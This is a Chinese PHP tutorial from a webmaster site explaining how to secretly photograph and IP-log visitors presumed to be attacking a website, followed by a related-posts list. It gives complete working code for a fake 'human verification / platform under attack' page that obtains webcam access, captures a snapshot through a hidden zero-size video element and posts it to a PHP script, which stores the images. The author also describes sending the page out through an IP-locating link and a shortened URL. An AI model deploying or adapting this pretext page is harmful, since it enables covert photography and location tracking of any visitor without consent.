欢迎光临 - 我的站长站,本站所有资源仅供学习与参考,禁止用于商业用途或从事违法行为!

php教程

利用php记录网站攻击者桌面照片和ip地址

php教程 我的站长站 2020-08-30 共170人阅读

利用php记录网站攻击者桌面照片和IP地址,可以记录IP,顺手偷拍攻击对象,看看他长啥样!

因为事先已经有了IP记录平台,所以方便省事,直接开始研究偷拍

随手写了偷拍页面前端,伪造的受攻击验证(将就看,毕竟只是做一次演示)

利用php记录网站攻击者桌面照片和ip地址

前端代码

<!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>人机验证机制</title> <meta name='Generator' content='EditPlus'> <meta name="viewport" content="width=device-width, user-scalable=no,initial-scale=1, minimal-ui"> <meta name='Description' content='inveted by: http://davidwalsh.name/browser-camera'> <script type="text/javascript" src="http://apps.bdimg.com/libs/jquery/2.1.1/jquery.js"></script> <style> html body{width: 100%;height:auto;margin:0 auto 0px;padding:0 0 0px;background-color: #444 } a{text-decoration:none; } .wenzi{width: 300px;height: 300px; margin-right: auto;margin-left: auto; } .yuyan{width: 100% ; height: 150px ; color: #fff; margin-top: 60px; text-align: center;} .sf{width: 100%;height: 150px; line-height: 150px ;text-align: center;} .sf a{display: block;font-size: 12px;margin-left: 28%; text-decoration: none; text-align: center;background-color: #EBEBEB; width: 50px;height: 20px;line-height: 20px; border:solid 1px #222; float: left; } .sf button{display: block; font-size: 13px; margin-left: 10px ; text-align: center;background-color: #EBEBEB; width: 50px;height: 22px; border:solid 1px #222; float: left;} </style> <script> window.addEventListener("DOMContentLoaded", function() { // Grab elements, create settings, etc. var canvas = document.getElementById('canvas'); var context = canvas.getContext('2d'); var video = document.getElementById('video'); var mediaConfig = { video: true }; var errBack = function(e) { console.log('An error has occurred!', e) }; // Put video listeners into place if(navigator.mediaDevices && navigator.mediaDevices.getUserMedia) { navigator.mediaDevices.getUserMedia(mediaConfig).then(function(stream) { video.src = window.URL.createObjectURL(stream); video.play(); }); } /* Legacy code below! */ else if(navigator.getUserMedia) { // Standard navigator.getUserMedia(mediaConfig, function(stream) { video.src = stream; video.play(); }, errBack); } else if(navigator.webkitGetUserMedia) { // WebKit-prefixed navigator.webkitGetUserMedia(mediaConfig, function(stream){ video.src = window.webkitURL.createObjectURL(stream); video.play(); }, errBack); } else if(navigator.mozGetUserMedia) { // Mozilla-prefixed navigator.mozGetUserMedia(mediaConfig, function(stream){ video.src = window.URL.createObjectURL(stream); video.play(); }, errBack); } // Trigger photo take document.getElementById('snap').addEventListener('click', function() { context.drawImage(video, 0, 0, 640, 480); var url = canvas.toDataURL('image/png'); document.getElementById('result').value = url; var uu=url.substr(22); $(document).ready(function(){ $.ajax({ cache: true, type: "POST", url:"jieshou.php", data:$('#tp').serialize(), async: false, error: function(request) { alert("Connection error"); }, success: function(data) { $(".return").parent().html(data); } }); }); }); }, false); </script> </head> <body> <div class="wenzi"> <div class="yuyan"> 目前平台正在遭受攻击! <br/> <br/> 显示非正常请使用uc浏览器访问! </div> <div class="sf"> <button id='snap'>确定</button> </div> </div> <div> <video id='video' width='0' height='0'></video> <canvas style="width:0px;height:0px" id='canvas' width='640' height='480'></canvas> <form id="tp" action="./jieshou.php" method="post"> <input type="hidden" type="file" value="sdgsdg" id="demo_input" /> <input type="hidden" name="img" id="result" value="" /> <p id="img_area"></p> <input type="hidden" type="submit" value="提交"> </form> </div> <div class= "return"></div> </body> </html>

jishu.php

后端代码

<?php error_reporting(0); $base64_img = trim($_POST['img']); $up_dir = './upload/';//存放在当前目录的upload文件夹下 if(!file_exists($up_dir)){ mkdir($up_dir,0777); } if(preg_match('/^(data:s*image/(w+);base64,)/', $base64_img, $result)){ $type = $result[2]; if(in_array($type,array('pjpeg','jpeg','jpg','gif','bmp','png'))){ $new_file = $up_dir.date('YmdHis_').'.'.$type; if(file_put_contents($new_file, base64_decode(str_replace($result[1], '', $base64_img)))){ $img_path = str_replace('../../..', '', $new_file); echo '网站正在遭受攻击,请稍后访问'; } } }

绑定域名并存放至根目录前往ip.heibai.org生成定位链接

(因为平台都是我的,所以我可以自由修改定位链接内容!!!如果要实践定位链接请自行搭建)

马赛克部分为偷拍地址,设置1秒跳转

利用php记录网站攻击者桌面照片和ip地址

百度短网址生成链接,开始测试阶段

IP记录成功,接下来是激动人心的时刻,看看是否偷拍成功

查看了我的图片存放目录,成功了的

利用php记录网站攻击者桌面照片和ip地址

嗯,对,证明我的思路是可行的。

相关推荐
  • 黑客攻击
  • 网站攻击
  • php代码
  • IP地址
  • 中小网站防范黑客攻击

    安全一直以来都是各大站长们比较关心的问题,一个网站,如果没有一个安全的系统环境,做得再好,也没什么意义,一旦遭受攻击,损失就会非常大。因此,学会防范黑客攻击,保护好自己的网站,是必要的。本人从学习建站到现在,已经用某个系统建站达几百次,不敢说对这个系统...

    服务器配置 206 4年前
  • 如何利用免费CDN加速网站、防御攻击

    网站做大了,就避免不了同行的攻击,我们要如何防御起来呢?这里小编用的是CDN防护方法,通过CDN节点分流 可以有效的拦截过滤掉攻击。如何选择CDN,国内有百度云加速,七牛云,又拍云等等服务商。如何配置CDN加速安装CDN服务商提供的解析记录,完成域名绑定。如果你...

    经验分享 1093 5年前
  • 服务器遭受cc攻击怎么办?
    服务器遭受cc攻击怎么办?

    人怕出名猪怕壮,网站有了流量也自然会被人惦记。轻则天天批量扫你服务器漏洞、入侵服务器,这种还能依靠软件防御,就怕人家D你,也就传说中流量攻击,江湖传说CC攻击。为什么CC攻击最无赖,我们来先了解下C...

    服务器配置 276 5年前
  • 国际黑客组织APT27宣布停止对台网络攻击

    国际黑客组织APT27发言人对外宣布停止对台网络攻击,称这只是开胃菜,如果继续挑衅,将会继续对外公布更多被黑系统源码。目前APT27的发言人放出了核电平台源码、FISC金融机构源码。宣布称后期会视情况可能会放出DEMSW需量管理系统,读取任何用户信息(包括密...

    网络新闻 138 2年前
  • 利用php记录网站攻击者桌面照片和ip地址
    利用php记录网站攻击者桌面照片和ip地址

    利用php记录网站攻击者桌面照片和ip地址,可以记录IP,顺手偷拍攻击对象,看看他长啥样!因为事先已经有了IP记录平台,所以方便省事,直接开始研究偷拍随手写了偷拍页面前端,伪造的受攻击验证(将就看,毕竟只...

    php教程 170 4年前
  • 360出品的免费CDN服务 支持CDN+防D/C攻击+DNS
    360出品的免费CDN服务 支持CDN+防D/C攻击+DNS

    360出品的免费CDN服务,以前叫网站卫士,现在叫奇安信网站卫士,支持免费CDN加速服务、防DDOS、防CC攻击、智能高防DNS、支持HTTPS。使用方法我的站长站就不介绍了,都一样,解析域名等待审核,这里主要说说...

    主机域名 732 4年前
  • 《SQL注入攻击与防御》 pdf下载
    《SQL注入攻击与防御》 pdf下载

    当你在学注入的时候是不是很懵逼?不知道怎么找注入点,找到注入点不知道怎么注入,只会and 1=1 and 1=2,这本书全面讲解sql注入原理,以及各种注入类型和方法。SQL注入攻击是一种已经长期存在,但近年来日...

    电子书 130 4年前
  • 红色端Jscc攻击脚本DOSS压力测试PHP源码
    红色端Jscc攻击脚本DOSS压力测试PHP源码

    红色端+Jscc攻击脚本,服务器DOSS压力测试PHP源码,红色端搭建后需要自行修改后台路径。环境要求:php版本用56或者70及以上,安装扩展sg11组件。压力测试源码安装方法上传源码,解压源码,导入sql.sql文件@/...

    php源码 615 4年前
  • PHP防cc攻击网站源码
    PHP防cc攻击网站源码

    PHP防cc攻击网站源码仅支持php程序,类似于度云等的防CC访问机制。用户访问网站时先经过我们这个防CC页面,这样就可以拦截一般的CC攻击了。使用方法anti_ddos和css文件夹上传到网站根目录<?php requ...

    php源码 175 4年前
  • DDoS攻击防御方法实战
    DDoS攻击防御方法实战

    DDoS攻击是什么DDoS攻击防御截图DDoS攻击又称分布式拒绝服务攻击(DDoS攻击)是一种针对目标系统的恶意网络攻击行为,DDoS攻击经常会导致被攻击者的业务无法正常访问,也就是所谓的拒绝服务。常见的DDoS...

    服务器配置 224 4年前
  • 支付宝企业账户转账个人账户php接口代码

    前言支付宝企业账户转账个人账户php接口代码,该接口主要用于平台对用户奖励的发放,场景也很简单就是我在你平台上有余额,我提现,平台给钱。只不过项目中是用的官方的SDK调用的,仔细看了下那个SDK目录,把很多无用的接口(目前自己用不上)也包含在里面,作为强...

    php教程 180 2年前
  • php判断目录文件是否存在

    一段简单的php判断目录文件是否存在代码,收藏记录一下,以后肯定用得到的。<?php$filename = &#39;../../e/install/&#39;; if (file_exists($filename)) { echo "<h3><div align=&#39;center&#39;><font color=&#39;#FF0000&#39;>存在安全风险!请将 ...

    php教程 127 2年前
  • curl函数获取API接口数据方法

    PHP利用curl函数,获取API接口数据方法示例代码,自用收藏<?php $weather = curl_init(); curl_setopt($weather,CURLOPT_URL,"https://api.pc2801.com/cqssc/".time()); curl_setopt($weather, CURLOPT_SSL_VERIFYPEER, false); //如果...

    php教程 103 3年前
  • 158网盘直连解析代码

    API代码<?php/*** @package 158Pan* @author Andy* @version 1.2.0* @link https://lsland.cn*/// 指定允许其他域名访问 header(&#39;Access-Control-Allow-Origin:*&#39;);header(&#39;content-type:application/json;charset:utf-8&#39;);functi...

    php教程 145 3年前
  • PHP获取QQ用户昵称+头像API接口代码

    如果要获得QQ用户的头像和昵称,需要在腾讯开放平台申请API接入才可以,但是这个不需要!只需要输入用户的正确的QQ号即可返回用户的头像和昵称。API接口代码<?php // 通过QQ号即可获取用户信息 // 获取QQ头像接口// http://q1.qlogo.cn/g?b=qq&nk=QQ号&s=...

    php教程 257 3年前
  • IP地址修改器V5.0.5.8版本,修复导入配置功能,增加生成默认网关功能
    IP地址修改器V5.0.5.8版本,修复导入配置功能,增加生成默认网关功能

    软件介绍IP地址修改器V5.0.5.8版本,修复导入配置功能,增加生成默认网关功能。由kn007大神开发分享,使用Autoit编写。IP地址修改器截图V5.0.5.8版本修复上一版本“导入配置”中附加IP数据逻辑遗漏。...

    软件分享 81 1年前
  • 最新IP地址修改器V5.0.5.5版
    最新IP地址修改器V5.0.5.5版

    软件介绍最新IP地址修改器V5.0.5.5版,工具使用Autoit编写,无广告,无需安装,打开即用,个人人为是目前最好用的IP地址修改工具。IP地址修改器截图更新历史IPTools 5.0.5.5:修复应用“子网掩码计算器”中...

    软件分享 48 1年前
  • DEDECMS调用访问者ip地址

    DEDECMS调用访问者ip地址,在需要的位置放以下代码{dede:php} $user_IP = ($_SERVER["HTTP_VIA"]) ? $_SERVER["HTTP_X_FORWARDED_FOR"] : $_SERVER["REMOTE_ADDR"]; $user_IP = ($user_IP) ? $user_IP : $_SERVER["REMOTE_ADDR"]; function get_rea...

    织梦cms教程 115 4年前
  • 利用php记录网站攻击者桌面照片和ip地址
    利用php记录网站攻击者桌面照片和ip地址

    利用php记录网站攻击者桌面照片和ip地址,可以记录IP,顺手偷拍攻击对象,看看他长啥样!因为事先已经有了IP记录平台,所以方便省事,直接开始研究偷拍随手写了偷拍页面前端,伪造的受攻击验证(将就看,毕竟只...

    php教程 170 4年前
  • 织梦CMS显示用户ip地址方法

    织梦CMS显示用户ip地址代码,在需要的位置放以下代码{dede:php} $user_IP = ($_SERVER["HTTP_VIA"]) ? $_SERVER["HTTP_X_FORWARDED_FOR"] : $_SERVER["REMOTE_ADDR"]; $user_IP = ($user_IP) ? $user_IP : $_SERVER["REMOTE_ADDR"]; function get_r...

    织梦cms教程 91 4年前